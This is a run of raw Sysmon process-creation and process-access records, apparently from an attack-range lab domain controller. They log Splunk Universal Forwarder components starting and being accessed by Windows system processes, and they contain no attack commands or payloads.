154100x80000000000000009298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:46.188{59A5CD1D-9326-6005-CB04-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:47.156{59A5CD1D-9327-6005-CC04-00000000A301}44764992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:47.031{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9327-6005-CC04-00000000A301}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:47.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:47.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:47.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:47.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:47.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:47.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:47.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:47.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:47.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:47.031{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9327-6005-CC04-00000000A301}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:47.031{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9327-6005-CC04-00000000A301}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:47.031{59A5CD1D-9327-6005-CC04-00000000A301}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.828{59A5CD1D-9328-6005-CE04-00000000A301}46721652C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.687{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9328-6005-CE04-00000000A301}4672C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.687{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9328-6005-CE04-00000000A301}4672C:\Program 
